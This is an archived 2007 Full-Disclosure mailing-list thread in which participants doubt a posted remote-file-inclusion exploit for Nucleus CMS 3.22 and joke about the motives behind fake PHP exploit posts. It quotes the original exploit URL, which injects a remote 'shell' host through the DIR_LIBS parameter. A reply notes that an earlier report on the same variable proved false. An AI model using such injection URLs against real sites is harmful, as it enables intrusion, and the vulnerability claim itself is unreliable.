lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [day] [month] [year] [list] 
Date: Tue, 8 May 2007 08:18:44 -0500
From: evilrabbi <evilrabbi@...il.com>
To: full-disclosure@...ts.grok.org.uk
Subject: Re: nucleus 3.22 >> RFI

I like the idea they are all terrorist passing secret messages in fake
exploits.
/me waits on the Tom Clancy movie

On 5/7/07, Ron Superior <rsuperior@...il.com> wrote:
>
> Hi folks,
>
>   Some months back I seem to remember people hypothesizing as to the
> real purpose behind some of these particularly lame fake PHP exploits.
> You know the ones I mean; they're mostly remote file includes, they
> often are decorated with some simple ASCII art, and the "thanks" and
> "greetz" sections are always loaded with names that suggest Turkish or
> other Middle Eastern origin.
>
>   The two most interesting suggestions that I recall were:
>
>   1) Somebody wanted to pump up the lists with PHP exploits so they
> could claim later that some large number X of PHP vulnerabilities had
> been posted to FD since some date.
>
>   2) Covert communication, or that the "exploits" were really secret
> messages between t3rr0ri$ts or something.
>
>   I'm sure there exists a motive beyond just spamming us to be
> annoying.  Any one have any new ideas, or good arguments for either of
> the above two ideas?
>
>     Ron
>
> Guasconi Vincent wrote:
> > On 5/6/07, security curmudgeon <jericho@...rition.org> wrote:
> >> : VENDOR :http://nucleuscms.org/
> >> : BY : s3rv3r_hack3r (hackerz.ir admin)
> >> : bug:
> >> : nucleus3.22/nucleus/plugins/skinfiles/index.php       =
> include($DIR_LIBS . 'PLUGINADMIN.php');
> >> : Exloit:
> >> :
> http://victim/nucleus/plugins/skinfiles/index.php?DIR_LIBS=http://shell
> >>
> >> I haven't examined the source code to this, but on June 16, 2006,
> >> gamr-14@...mail.com disclosed RFI vulnerabilities [1] in four Nucleus
> >> scripts, all with the DIR_LIBS variable as the injection point. This
> was
> >> subsequently proven to be a false report as the variable was previously
> >> set and could not be manipulated by an attacker.
> >>
> >> Have you actually tested this, or is this based on a quick grep of the
> >> source code?
> >
> > They're like bots now.
> > They didn't hear you, and you can't stop them.
> >
> > Try a spam rule.
> >
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>



-- 
-- h0 h0 h0 --
www.nopsled.net

Content of type "text/html" skipped

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ